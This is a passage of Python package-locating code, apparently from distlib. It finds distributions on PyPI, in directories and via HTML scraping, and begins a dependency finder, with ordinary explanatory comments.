        # Because of bugs in some of the handlers on some of the platforms,
        # we use our own opener rather than just using urlopen.
        self.opener = build_opener(RedirectHandler())
        # If get_project() is called from locate(), the matcher instance
        # is set from the requirement passed to locate(). See issue #18 for
        # why this can be useful to know.
        self.matcher = None
        self.errors = queue.Queue()

    def get_errors(self):
        """
        Return any errors which have occurred.
        """
        result = []
        while not self.errors.empty():  # pragma: no cover
            try:
                e = self.errors.get(False)
                result.append(e)
            except self.errors.Empty:
                continue
            self.errors.task_done()
        return result

    def clear_errors(self):
        """
        Clear any errors which may have been logged.
        """
        # Just get the errors and throw them away
        self.get_errors()

    def clear_cache(self):
        self._cache.clear()

    def _get_scheme(self):
        return self._scheme

    def _set_scheme(self, value):
        self._scheme = value

    scheme = property(_get_scheme, _set_scheme)

    def _get_project(self, name):
        """
        For a given project, get a dictionary mapping available versions to Distribution
        instances.

        This should be implemented in subclasses.

        If called from a locate() request, self.matcher will be set to a
        matcher for the requirement to satisfy, otherwise it will be None.
        """
        raise NotImplementedError('Please implement in the subclass')

    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        raise NotImplementedError('Please implement in the subclass')

    def get_project(self, name):
        """
        For a given project, get a dictionary mapping available versions to Distribution
        instances.

        This calls _get_project to do all the work, and just implements a caching layer on top.
        """
        if self._cache is None:  # pragma: no cover
            result = self._get_project(name)
        elif name in self._cache:
            result = self._cache[name]
        else:
            self.clear_errors()
            result = self._get_project(name)
            self._cache[name] = result
        return result

    def score_url(self, url):
        """
        Give an url a score which can be used to choose preferred URLs
        for a given project release.
        """
        t = urlparse(url)
        basename = posixpath.basename(t.path)
        compatible = True
        is_wheel = basename.endswith('.whl')
        is_downloadable = basename.endswith(self.downloadable_extensions)
        if is_wheel:
            compatible = is_compatible(Wheel(basename), self.wheel_tags)
        return (t.scheme == 'https', 'pypi.python.org' in t.netloc,
                is_downloadable, is_wheel, compatible, basename)

    def prefer_url(self, url1, url2):
        """
        Choose one of two URLs where both are candidates for distribution
        archives for the same version of a distribution (for example,
        .tar.gz vs. zip).

        The current implementation favours https:// URLs over http://, archives
        from PyPI over those from other locations, wheel compatibility (if a
        wheel) and then the archive name.
        """
        result = url2
        if url1:
            s1 = self.score_url(url1)
            s2 = self.score_url(url2)
            if s1 > s2:
                result = url1
            if result != url2:
                logger.debug('Not replacing %r with %r', url1, url2)
            else:
                logger.debug('Replacing %r with %r', url1, url2)
        return result

    def split_filename(self, filename, project_name):
        """
        Attempt to split a filename in project name, version and Python version.
        """
        return split_filename(filename, project_name)

    def convert_url_to_download_info(self, url, project_name):
        """
        See if a URL is a candidate for a download URL for a project (the URL
        has typically been scraped from an HTML page).

        If it is, a dictionary is returned with keys "name", "version",
        "filename" and "url"; otherwise, None is returned.
        """
        def same_project(name1, name2):
            return normalize_name(name1) == normalize_name(name2)

        result = None
        scheme, netloc, path, params, query, frag = urlparse(url)
        if frag.lower().startswith('egg='):  # pragma: no cover
            logger.debug('%s: version hint in fragment: %r',
                         project_name, frag)
        m = HASHER_HASH.match(frag)
        if m:
            algo, digest = m.groups()
        else:
            algo, digest = None, None
        origpath = path
        if path and path[-1] == '/':  # pragma: no cover
            path = path[:-1]
        if path.endswith('.whl'):
            try:
                wheel = Wheel(path)
                if not is_compatible(wheel, self.wheel_tags):
                    logger.debug('Wheel not compatible: %s', path)
                else:
                    if project_name is None:
                        include = True
                    else:
                        include = same_project(wheel.name, project_name)
                    if include:
                        result = {
                            'name': wheel.name,
                            'version': wheel.version,
                            'filename': wheel.filename,
                            'url': urlunparse((scheme, netloc, origpath,
                                               params, query, '')),
                            'python-version': ', '.join(
                                ['.'.join(list(v[2:])) for v in wheel.pyver]),
                        }
            except Exception as e:  # pragma: no cover
                logger.warning('invalid path for wheel: %s', path)
        elif not path.endswith(self.downloadable_extensions):  # pragma: no cover
            logger.debug('Not downloadable: %s', path)
        else:  # downloadable extension
            path = filename = posixpath.basename(path)
            for ext in self.downloadable_extensions:
                if path.endswith(ext):
                    path = path[:-len(ext)]
                    t = self.split_filename(path, project_name)
                    if not t:  # pragma: no cover
                        # BUGFIX: message previously read 'No match for
                        # pokemon/version' due to a corrupted search/replace.
                        logger.debug('No match for project/version: %s', path)
                    else:
                        name, version, pyver = t
                        if not project_name or same_project(project_name, name):
                            result = {
                                'name': name,
                                'version': version,
                                'filename': filename,
                                'url': urlunparse((scheme, netloc, origpath,
                                                   params, query, '')),
                                #'packagetype': 'sdist',
                            }
                            if pyver:  # pragma: no cover
                                result['python-version'] = pyver
                    break
        if result and algo:
            result['%s_digest' % algo] = digest
        return result

    def _get_digest(self, info):
        """
        Get a digest from a dictionary by looking at keys of the form
        'algo_digest'.

        Returns a 2-tuple (algo, digest) if found, else None. Currently
        looks only for SHA256, then MD5.
        """
        result = None
        for algo in ('sha256', 'md5'):
            key = '%s_digest' % algo
            if key in info:
                result = (algo, info[key])
                break
        return result

    def _update_version_data(self, result, info):
        """
        Update a result dictionary (the final result from _get_project) with a
        dictionary for a specific version, which typically holds information
        gleaned from a filename or URL for an archive for the distribution.
        """
        name = info.pop('name')
        version = info.pop('version')
        if version in result:
            dist = result[version]
            md = dist.metadata
        else:
            dist = make_dist(name, version, scheme=self.scheme)
            md = dist.metadata
        dist.digest = digest = self._get_digest(info)
        url = info['url']
        result['digests'][url] = digest
        if md.source_url != info['url']:
            md.source_url = self.prefer_url(md.source_url, url)
        result['urls'].setdefault(version, set()).add(url)
        dist.locator = self
        result[version] = dist

    def locate(self, requirement, prereleases=False):
        """
        Find the most recent distribution which matches the given
        requirement.

        :param requirement: A requirement of the form 'foo (1.0)' or perhaps
                            'foo (>= 1.0, < 2.0, != 1.3)'
        :param prereleases: If ``True``, allow pre-release versions
                            to be located. Otherwise, pre-release versions
                            are not returned.
        :return: A :class:`Distribution` instance, or ``None`` if no such
                 distribution could be located.
        """
        result = None
        r = parse_requirement(requirement)
        if r is None:  # pragma: no cover
            raise DistlibException('Not a valid requirement: %r' % requirement)
        scheme = get_scheme(self.scheme)
        self.matcher = matcher = scheme.matcher(r.requirement)
        logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
        versions = self.get_project(r.name)
        if len(versions) > 2:  # urls and digests keys are present
            # sometimes, versions are invalid
            slist = []
            vcls = matcher.version_class
            for k in versions:
                if k in ('urls', 'digests'):
                    continue
                try:
                    if not matcher.match(k):
                        logger.debug('%s did not match %r', matcher, k)
                    else:
                        if prereleases or not vcls(k).is_prerelease:
                            slist.append(k)
                        else:
                            logger.debug('skipping pre-release '
                                         'version %s of %s', k, matcher.name)
                except Exception:  # pragma: no cover
                    logger.warning('error matching %s with %r', matcher, k)
                    pass  # slist.append(k)
            if len(slist) > 1:
                slist = sorted(slist, key=scheme.key)
            if slist:
                logger.debug('sorted list: %s', slist)
                version = slist[-1]
                result = versions[version]
        if result:
            if r.extras:
                result.extras = r.extras
            result.download_urls = versions.get('urls', {}).get(version, set())
            d = {}
            sd = versions.get('digests', {})
            for url in result.download_urls:
                if url in sd:  # pragma: no cover
                    d[url] = sd[url]
            result.digests = d
        self.matcher = None
        return result
class PyPIRPCLocator(Locator):
    """
    This locator uses XML-RPC to locate distributions. It therefore
    cannot be used with simple mirrors (that only mirror file content).
    """
    def __init__(self, url, **kwargs):
        """
        Initialise an instance.

        :param url: The URL to use for XML-RPC.
        :param kwargs: Passed to the superclass constructor.
        """
        super(PyPIRPCLocator, self).__init__(**kwargs)
        self.base_url = url
        self.client = ServerProxy(url, timeout=3.0)

    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        return set(self.client.list_packages())

    def _get_project(self, name):
        """Build the version -> Distribution mapping via the index's XML-RPC API."""
        result = {'urls': {}, 'digests': {}}
        versions = self.client.package_releases(name, True)
        for v in versions:
            urls = self.client.release_urls(name, v)
            data = self.client.release_data(name, v)
            metadata = Metadata(scheme=self.scheme)
            metadata.name = data['name']
            metadata.version = data['version']
            metadata.license = data.get('license')
            metadata.keywords = data.get('keywords', [])
            metadata.summary = data.get('summary')
            dist = Distribution(metadata)
            if urls:
                # The first URL is treated as the canonical source URL;
                # all URLs (and their digests) are recorded in the result.
                info = urls[0]
                metadata.source_url = info['url']
                dist.digest = self._get_digest(info)
                dist.locator = self
                result[v] = dist
                for info in urls:
                    url = info['url']
                    digest = self._get_digest(info)
                    result['urls'].setdefault(v, set()).add(url)
                    result['digests'][url] = digest
        return result
class PyPIJSONLocator(Locator):
    """
    This locator uses PyPI's JSON interface. It's very limited in functionality
    and probably not worth using.
    """
    def __init__(self, url, **kwargs):
        super(PyPIJSONLocator, self).__init__(**kwargs)
        self.base_url = ensure_slash(url)

    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        raise NotImplementedError('Not available from this locator')

    def _get_project(self, name):
        """Build the version -> Distribution mapping from the /<name>/json endpoint."""
        result = {'urls': {}, 'digests': {}}
        url = urljoin(self.base_url, '%s/json' % quote(name))
        try:
            resp = self.opener.open(url)
            data = resp.read().decode()  # for now
            d = json.loads(data)
            md = Metadata(scheme=self.scheme)
            data = d['info']
            md.name = data['name']
            md.version = data['version']
            md.license = data.get('license')
            md.keywords = data.get('keywords', [])
            md.summary = data.get('summary')
            dist = Distribution(md)
            dist.locator = self
            urls = d['urls']
            result[md.version] = dist
            for info in d['urls']:
                url = info['url']
                dist.download_urls.add(url)
                dist.digests[url] = self._get_digest(info)
                result['urls'].setdefault(md.version, set()).add(url)
                result['digests'][url] = self._get_digest(info)
            # Now get other releases
            for version, infos in d['releases'].items():
                if version == md.version:
                    continue  # already done
                omd = Metadata(scheme=self.scheme)
                omd.name = md.name
                omd.version = version
                odist = Distribution(omd)
                odist.locator = self
                result[version] = odist
                for info in infos:
                    url = info['url']
                    odist.download_urls.add(url)
                    odist.digests[url] = self._get_digest(info)
                    result['urls'].setdefault(version, set()).add(url)
                    result['digests'][url] = self._get_digest(info)
#            for info in urls:
#                md.source_url = info['url']
#                dist.digest = self._get_digest(info)
#                dist.locator = self
#            for info in urls:
#                url = info['url']
#                result['urls'].setdefault(md.version, set()).add(url)
#                result['digests'][url] = self._get_digest(info)
        except Exception as e:
            # Errors are recorded (see Locator.get_errors) rather than raised.
            self.errors.put(text_type(e))
            logger.exception('JSON fetch failed: %s', e)
        return result
class Page(object):
    """
    This class represents a scraped HTML page.
    """
    # The following slightly hairy-looking regex just looks for the contents of
    # an anchor link, which has an attribute "href" either immediately preceded
    # or immediately followed by a "rel" attribute. The attribute values can be
    # declared with double quotes, single quotes or no quotes - which leads to
    # the length of the expression.
    _href = re.compile("""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""", re.I | re.S | re.X)
    _base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)

    def __init__(self, data, url):
        """
        Initialise an instance with the Unicode page contents and the URL they
        came from.
        """
        self.data = data
        self.base_url = self.url = url
        # Honour a <base href="..."> tag, if present, when resolving links.
        m = self._base.search(self.data)
        if m:
            self.base_url = m.group(1)

    _clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)

    @cached_property
    def links(self):
        """
        Return the URLs of all the links on a page together with information
        about their "rel" attribute, for determining which ones to treat as
        downloads and which ones to queue for further scraping.
        """
        def clean(url):
            "Tidy up an URL."
            scheme, netloc, path, params, query, frag = urlparse(url)
            return urlunparse((scheme, netloc, quote(path),
                               params, query, frag))

        result = set()
        for match in self._href.finditer(self.data):
            d = match.groupdict('')
            rel = (d['rel1'] or d['rel2'] or d['rel3'] or
                   d['rel4'] or d['rel5'] or d['rel6'])
            url = d['url1'] or d['url2'] or d['url3']
            url = urljoin(self.base_url, url)
            url = unescape(url)
            # Percent-encode any characters that are unsafe in URLs.
            url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
            result.add((url, rel))
        # We sort the result, hoping to bring the most recent versions
        # to the front
        result = sorted(result, key=lambda t: t[0], reverse=True)
        return result
class SimpleScrapingLocator(Locator):
    """
    A locator which scrapes HTML pages to locate downloads for a distribution.
    This runs multiple threads to do the I/O; performance is at least as good
    as pip's PackageFinder, which works in an analogous fashion.
    """

    # These are used to deal with various Content-Encoding schemes.
    decoders = {
        'deflate': zlib.decompress,
        # BUGFIX: the lambda previously referenced an undefined name ``d``
        # (NameError whenever a gzip-encoded response was decoded); it must
        # use its own parameter ``b``.
        'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(b)).read(),
        'none': lambda b: b,
    }

    def __init__(self, url, timeout=None, num_workers=10, **kwargs):
        """
        Initialise an instance.
        :param url: The root URL to use for scraping.
        :param timeout: The timeout, in seconds, to be applied to requests.
                        This defaults to ``None`` (no timeout specified).
        :param num_workers: The number of worker threads you want to do I/O,
                            This defaults to 10.
        :param kwargs: Passed to the superclass.
        """
        super(SimpleScrapingLocator, self).__init__(**kwargs)
        self.base_url = ensure_slash(url)
        self.timeout = timeout
        self._page_cache = {}
        self._seen = set()
        self._to_fetch = queue.Queue()
        self._bad_hosts = set()
        self.skip_externals = False
        self.num_workers = num_workers
        self._lock = threading.RLock()
        # See issue #45: we need to be resilient when the locator is used
        # in a thread, e.g. with concurrent.futures. We can't use self._lock
        # as it is for coordinating our internal threads - the ones created
        # in _prepare_threads.
        self._gplock = threading.RLock()
        self.platform_check = False  # See issue #112

    def _prepare_threads(self):
        """
        Threads are created only when get_project is called, and terminate
        before it returns. They are there primarily to parallelise I/O (i.e.
        fetching web pages).
        """
        self._threads = []
        for i in range(self.num_workers):
            t = threading.Thread(target=self._fetch)
            t.setDaemon(True)
            t.start()
            self._threads.append(t)

    def _wait_threads(self):
        """
        Tell all the threads to terminate (by sending a sentinel value) and
        wait for them to do so.
        """
        # Note that you need two loops, since you can't say which
        # thread will get each sentinel
        for t in self._threads:
            self._to_fetch.put(None)  # sentinel
        for t in self._threads:
            t.join()
        self._threads = []

    def _get_project(self, name):
        result = {'urls': {}, 'digests': {}}
        with self._gplock:
            self.result = result
            self.project_name = name
            url = urljoin(self.base_url, '%s/' % quote(name))
            self._seen.clear()
            self._page_cache.clear()
            self._prepare_threads()
            try:
                logger.debug('Queueing %s', url)
                self._to_fetch.put(url)
                self._to_fetch.join()
            finally:
                self._wait_threads()
            del self.result
        return result

    platform_dependent = re.compile(r'\b(linux_(i\d86|x86_64|arm\w+)|'
                                    r'win(32|_amd64)|macosx_?\d+)\b', re.I)

    def _is_platform_dependent(self, url):
        """
        Does an URL refer to a platform-specific download?
        """
        return self.platform_dependent.search(url)

    def _process_download(self, url):
        """
        See if an URL is a suitable download for a project.

        If it is, register information in the result dictionary (for
        _get_project) about the specific version it's for.

        Note that the return value isn't actually used other than as a boolean
        value.
        """
        if self.platform_check and self._is_platform_dependent(url):
            info = None
        else:
            info = self.convert_url_to_download_info(url, self.project_name)
        logger.debug('process_download: %s -> %s', url, info)
        if info:
            with self._lock:  # needed because self.result is shared
                self._update_version_data(self.result, info)
        return info

    def _should_queue(self, link, referrer, rel):
        """
        Determine whether a link URL from a referring page and with a
        particular "rel" attribute should be queued for scraping.
        """
        scheme, netloc, path, _, _, _ = urlparse(link)
        if path.endswith(self.source_extensions + self.binary_extensions +
                         self.excluded_extensions):
            result = False
        elif self.skip_externals and not link.startswith(self.base_url):
            result = False
        elif not referrer.startswith(self.base_url):
            result = False
        elif rel not in ('homepage', 'download'):
            result = False
        elif scheme not in ('http', 'https', 'ftp'):
            result = False
        elif self._is_platform_dependent(link):
            result = False
        else:
            host = netloc.split(':', 1)[0]
            if host.lower() == 'localhost':
                result = False
            else:
                result = True
        logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
                     referrer, result)
        return result

    def _fetch(self):
        """
        Get a URL to fetch from the work queue, get the HTML page, examine its
        links for download candidates and candidates for further scraping.

        This is a handy method to run in a thread.
        """
        while True:
            url = self._to_fetch.get()
            try:
                if url:
                    page = self.get_page(url)
                    if page is None:  # e.g. after an error
                        continue
                    for link, rel in page.links:
                        if link not in self._seen:
                            try:
                                self._seen.add(link)
                                if (not self._process_download(link) and
                                        self._should_queue(link, url, rel)):
                                    logger.debug('Queueing %s from %s', link, url)
                                    self._to_fetch.put(link)
                            except MetadataInvalidError:  # e.g. invalid versions
                                pass
            except Exception as e:  # pragma: no cover
                self.errors.put(text_type(e))
            finally:
                # always do this, to avoid hangs :-)
                self._to_fetch.task_done()
            if not url:
                #logger.debug('Sentinel seen, quitting.')
                break

    def get_page(self, url):
        """
        Get the HTML for an URL, possibly from an in-memory cache.

        XXX TODO Note: this cache is never actually cleared. It's assumed that
        the data won't get stale over the lifetime of a locator instance (not
        necessarily true for the default_locator).
        """
        # http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
        scheme, netloc, path, _, _, _ = urlparse(url)
        if scheme == 'file' and os.path.isdir(url2pathname(path)):
            url = urljoin(ensure_slash(url), 'index.html')
        if url in self._page_cache:
            result = self._page_cache[url]
            logger.debug('Returning %s from cache: %s', url, result)
        else:
            host = netloc.split(':', 1)[0]
            result = None
            if host in self._bad_hosts:
                logger.debug('Skipping %s due to bad host %s', url, host)
            else:
                req = Request(url, headers={'Accept-encoding': 'identity'})
                try:
                    logger.debug('Fetching %s', url)
                    resp = self.opener.open(req, timeout=self.timeout)
                    logger.debug('Fetched %s', url)
                    headers = resp.info()
                    content_type = headers.get('Content-Type', '')
                    if HTML_CONTENT_TYPE.match(content_type):
                        final_url = resp.geturl()
                        data = resp.read()
                        encoding = headers.get('Content-Encoding')
                        if encoding:
                            decoder = self.decoders[encoding]  # fail if not found
                            data = decoder(data)
                        encoding = 'utf-8'
                        m = CHARSET.search(content_type)
                        if m:
                            encoding = m.group(1)
                        try:
                            data = data.decode(encoding)
                        except UnicodeError:  # pragma: no cover
                            data = data.decode('latin-1')  # fallback
                        result = Page(data, final_url)
                        self._page_cache[final_url] = result
                except HTTPError as e:
                    if e.code != 404:
                        logger.exception('Fetch failed: %s: %s', url, e)
                except URLError as e:  # pragma: no cover
                    logger.exception('Fetch failed: %s: %s', url, e)
                    with self._lock:
                        self._bad_hosts.add(host)
                except Exception as e:  # pragma: no cover
                    logger.exception('Fetch failed: %s: %s', url, e)
                finally:
                    self._page_cache[url] = result  # even if None (failure)
        return result

    _distname_re = re.compile('<a href=[^>]*>([^<]+)<')

    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        result = set()
        page = self.get_page(self.base_url)
        if not page:
            raise DistlibException('Unable to get %s' % self.base_url)
        for match in self._distname_re.finditer(page.data):
            result.add(match.group(1))
        return result
class DirectoryLocator(Locator):
    """
    This class locates distributions in a directory tree.
    """
    def __init__(self, path, **kwargs):
        """
        Initialise an instance.
        :param path: The root of the directory tree to search.
        :param kwargs: Passed to the superclass constructor,
                       except for:
                       * recursive - if True (the default), subdirectories are
                         recursed into. If False, only the top-level directory
                         is searched,
        """
        self.recursive = kwargs.pop('recursive', True)
        super(DirectoryLocator, self).__init__(**kwargs)
        path = os.path.abspath(path)
        if not os.path.isdir(path):  # pragma: no cover
            raise DistlibException('Not a directory: %r' % path)
        self.base_dir = path

    def should_include(self, filename, parent):
        """
        Should a filename be considered as a candidate for a distribution
        archive? As well as the filename, the directory which contains it
        is provided, though not used by the current implementation.
        """
        return filename.endswith(self.downloadable_extensions)

    def _get_project(self, name):
        # Walk the tree, turning each candidate archive into a file:// URL
        # and feeding it through the shared URL-to-download-info logic.
        result = {'urls': {}, 'digests': {}}
        for root, dirs, files in os.walk(self.base_dir):
            for fn in files:
                if self.should_include(fn, root):
                    fn = os.path.join(root, fn)
                    url = urlunparse(('file', '',
                                      pathname2url(os.path.abspath(fn)),
                                      '', '', ''))
                    info = self.convert_url_to_download_info(url, name)
                    if info:
                        self._update_version_data(result, info)
            if not self.recursive:
                break
        return result

    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        result = set()
        for root, dirs, files in os.walk(self.base_dir):
            for fn in files:
                if self.should_include(fn, root):
                    fn = os.path.join(root, fn)
                    url = urlunparse(('file', '',
                                      pathname2url(os.path.abspath(fn)),
                                      '', '', ''))
                    info = self.convert_url_to_download_info(url, None)
                    if info:
                        result.add(info['name'])
            if not self.recursive:
                break
        return result
class JSONLocator(Locator):
    """
    This locator uses special extended metadata (not available on PyPI) and is
    the basis of performant dependency resolution in distlib. Other locators
    require archive downloads before dependencies can be determined! As you
    might imagine, that can be slow.
    """

    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        raise NotImplementedError('Not available from this locator')

    def _get_project(self, name):
        result = {'urls': {}, 'digests': {}}
        data = get_project_data(name)
        for info in (data or {}).get('files', []):
            # Only source distributions carry the metadata we need.
            if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
                continue
            # Summaries are deliberately absent from the extended project
            # metadata: they add bulk without helping resolution.
            dist = make_dist(data['name'], info['version'],
                             summary=data.get('summary',
                                              'Placeholder for summary'),
                             scheme=self.scheme)
            md = dist.metadata
            md.source_url = info['url']
            # TODO SHA256 digest
            if info.get('digest'):
                dist.digest = ('md5', info['digest'])
            md.dependencies = info.get('requirements', {})
            dist.exports = info.get('exports', {})
            result[dist.version] = dist
            result['urls'].setdefault(dist.version, set()).add(info['url'])
        return result
class DistPathLocator(Locator):
    """
    This locator finds installed distributions in a path. It can be useful for
    adding to an :class:`AggregatingLocator`.
    """

    def __init__(self, distpath, **kwargs):
        """
        Initialise an instance.
        :param distpath: A :class:`DistributionPath` instance to search.
        """
        super(DistPathLocator, self).__init__(**kwargs)
        assert isinstance(distpath, DistributionPath)
        self.distpath = distpath

    def _get_project(self, name):
        dist = self.distpath.get_distribution(name)
        if dist is None:
            # Nothing installed under this name.
            return {'urls': {}, 'digests': {}}
        # A single installed distribution provides exactly one version;
        # no digest information is available for it.
        return {
            dist.version: dist,
            'urls': {dist.version: set([dist.source_url])},
            'digests': {dist.version: set([None])},
        }
class AggregatingLocator(Locator):
    """
    This class allows you to chain and/or merge a list of locators.
    """

    def __init__(self, *locators, **kwargs):
        """
        Initialise an instance.
        :param locators: The list of locators to search.
        :param kwargs: Passed to the superclass constructor,
                       except for:
                       * merge - if False (the default), the first successful
                         search from any of the locators is returned. If True,
                         the results from all locators are merged (this can be
                         slow).
        """
        self.merge = kwargs.pop('merge', False)
        self.locators = locators
        super(AggregatingLocator, self).__init__(**kwargs)

    def clear_cache(self):
        # Clear our own cache and that of every child locator.
        super(AggregatingLocator, self).clear_cache()
        for locator in self.locators:
            locator.clear_cache()

    def _set_scheme(self, value):
        # Propagate scheme changes to all child locators so they stay
        # consistent with this aggregator.
        self._scheme = value
        for locator in self.locators:
            locator.scheme = value

    # Reuse the base class getter, but install a setter which keeps the
    # child locators in sync.
    scheme = property(Locator.scheme.fget, _set_scheme)

    def _get_project(self, name):
        result = {}
        for locator in self.locators:
            d = locator.get_project(name)
            if d:
                if self.merge:
                    # Merge mode: combine this locator's result into the
                    # accumulated one, unioning per-version URL sets and
                    # preserving previously-seen digests.
                    files = result.get('urls', {})
                    digests = result.get('digests', {})
                    # next line could overwrite result['urls'], result['digests']
                    result.update(d)
                    df = result.get('urls')
                    if files and df:
                        for k, v in files.items():
                            if k in df:
                                df[k] |= v
                            else:
                                df[k] = v
                    dd = result.get('digests')
                    if digests and dd:
                        dd.update(digests)
                else:
                    # See issue #18. If any dists are found and we're looking
                    # for specific constraints, we only return something if
                    # a match is found. For example, if a DirectoryLocator
                    # returns just foo (1.0) while we're looking for
                    # foo (>= 2.0), we'll pretend there was nothing there so
                    # that subsequent locators can be queried. Otherwise we
                    # would just return foo (1.0) which would then lead to a
                    # failure to find foo (>= 2.0), because other locators
                    # weren't searched. Note that this only matters when
                    # merge=False.
                    if self.matcher is None:
                        found = True
                    else:
                        found = False
                        for k in d:
                            if self.matcher.match(k):
                                found = True
                                break
                    if found:
                        # First-match mode: stop at the first locator whose
                        # result satisfies the constraints.
                        result = d
                        break
        return result

    def get_distribution_names(self):
        """
        Return all the distribution names known to this locator.
        """
        result = set()
        for locator in self.locators:
            try:
                result |= locator.get_distribution_names()
            except NotImplementedError:
                # Some locators (e.g. JSONLocator) cannot enumerate names;
                # skip them rather than failing the whole aggregation.
                pass
        return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
# NOTE(review): pypi.python.org is the legacy PyPI hostname (now redirected
# to pypi.org) -- confirm the endpoint is still reachable before relying on
# this default.
default_locator = AggregatingLocator(
                    JSONLocator(),
                    SimpleScrapingLocator('https://pypi.python.org/simple/',
                                          timeout=3.0),
                    scheme='legacy')

# Convenience alias: locate a distribution via the default locator chain.
locate = default_locator.locate

# Parses requirements of the form "name (== version)" / "name (version)".
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
                             r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
    """
    Locate dependencies for distributions.
    """

    def __init__(self, locator=None):
        """
        Initialise an instance, using the specified locator
        to locate distributions.
        """
        self.locator = locator or default_locator
        self.scheme = get_scheme(self.locator.scheme)
        # NOTE: the per-search state (self.provided, self.dists,
        # self.dists_by_name, self.reqts) is (re)initialised in find().

    def add_distribution(self, dist):
        """
        Add a distribution to the finder. This will update internal information
        about who provides what.
        :param dist: The distribution to add.
        """
        logger.debug('adding distribution %s', dist)
        name = dist.key
        self.dists_by_name[name] = dist
        self.dists[(name, dist.version)] = dist
        # Record every (version, dist) pair this distribution provides.
        for p in dist.provides:
            name, version = parse_name_and_version(p)
            logger.debug('Add to provided: %s, %s, %s', name, version, dist)
            self.provided.setdefault(name, set()).add((version, dist))

    def remove_distribution(self, dist):
        """
        Remove a distribution from the finder. This will update internal
        information about who provides what.
        :param dist: The distribution to remove.
        """
        logger.debug('removing distribution %s', dist)
        name = dist.key
        del self.dists_by_name[name]
        del self.dists[(name, dist.version)]
        for p in dist.provides:
            name, version = parse_name_and_version(p)
            logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
            s = self.provided[name]
            s.remove((version, dist))
            if not s:
                # Drop the entry entirely once nothing provides this name.
                del self.provided[name]

    def get_matcher(self, reqt):
        """
        Get a version matcher for a requirement.
        :param reqt: The requirement
        :type reqt: str
        :return: A version matcher (an instance of
                 :class:`distlib.version.Matcher`).
        """
        try:
            matcher = self.scheme.matcher(reqt)
        except UnsupportedVersionError:  # pragma: no cover
            # XXX compat-mode if cannot read the version
            name = reqt.split()[0]
            matcher = self.scheme.matcher(name)
        return matcher

    def find_providers(self, reqt):
        """
        Find the distributions which can fulfill a requirement.
        :param reqt: The requirement.
        :type reqt: str
        :return: A set of distribution which can fulfill the requirement.
        """
        matcher = self.get_matcher(reqt)
        name = matcher.key   # case-insensitive
        result = set()
        provided = self.provided
        if name in provided:
            for version, provider in provided[name]:
                try:
                    match = matcher.match(version)
                except UnsupportedVersionError:
                    match = False
                if match:
                    # First matching provider wins; stop searching.
                    result.add(provider)
                    break
        return result

    def try_to_replace(self, provider, other, problems):
        """
        Attempt to replace one provider with another. This is typically used
        when resolving dependencies from multiple sources, e.g. A requires
        (B >= 1.0) while C requires (B >= 1.1).
        For successful replacement, ``provider`` must meet all the requirements
        which ``other`` fulfills.
        :param provider: The provider we are trying to replace with.
        :param other: The provider we're trying to replace.
        :param problems: If False is returned, this will contain what
                         problems prevented replacement. This is currently
                         a tuple of the literal string 'cantreplace',
                         ``provider``, ``other``  and the set of requirements
                         that ``provider`` couldn't fulfill.
        :return: True if we can replace ``other`` with ``provider``, else
                 False.
        """
        rlist = self.reqts[other]
        unmatched = set()
        # Check every requirement currently satisfied by ``other``.
        for s in rlist:
            matcher = self.get_matcher(s)
            if not matcher.match(provider.version):
                unmatched.add(s)
        if unmatched:
            # can't replace other with provider
            problems.add(('cantreplace', provider, other,
                          frozenset(unmatched)))
            result = False
        else:
            # can replace other with provider
            self.remove_distribution(other)
            del self.reqts[other]
            for s in rlist:
                self.reqts.setdefault(provider, set()).add(s)
            self.add_distribution(provider)
            result = True
        return result

    def find(self, requirement, meta_extras=None, prereleases=False):
        """
        Find a distribution and all distributions it depends on.
        :param requirement: The requirement specifying the distribution to
                            find, or a Distribution instance.
        :param meta_extras: A list of meta extras such as :test:, :build: and
                            so on.
        :param prereleases: If ``True``, allow pre-release versions to be
                            returned - otherwise, don't return prereleases
                            unless they're all that's available.
        Return a set of :class:`Distribution` instances and a set of
        problems.
        The distributions returned should be such that they have the
        :attr:`required` attribute set to ``True`` if they were
        from the ``requirement`` passed to ``find()``, and they have the
        :attr:`build_time_dependency` attribute set to ``True`` unless they
        are post-installation dependencies of the ``requirement``.
        The problems should be a tuple consisting of the string
        ``'unsatisfied'`` and the requirement which couldn't be satisfied
        by any distribution known to the locator.
        """
        # Reset the per-search state.
        self.provided = {}
        self.dists = {}
        self.dists_by_name = {}
        self.reqts = {}

        meta_extras = set(meta_extras or [])
        if ':*:' in meta_extras:
            meta_extras.remove(':*:')
            # :meta: and :run: are implicitly included
            meta_extras |= set([':test:', ':build:', ':dev:'])

        # Accept either an already-located Distribution or a requirement
        # string to be resolved via the locator.
        if isinstance(requirement, Distribution):
            dist = odist = requirement
            logger.debug('passed %s as requirement', odist)
        else:
            dist = odist = self.locator.locate(requirement,
                                               prereleases=prereleases)
            if dist is None:
                raise DistlibException('Unable to locate %r' % requirement)
            logger.debug('located %s', odist)
        dist.requested = True
        problems = set()
        # Worklist of distributions whose requirements still need expanding.
        todo = set([dist])
        install_dists = set([odist])
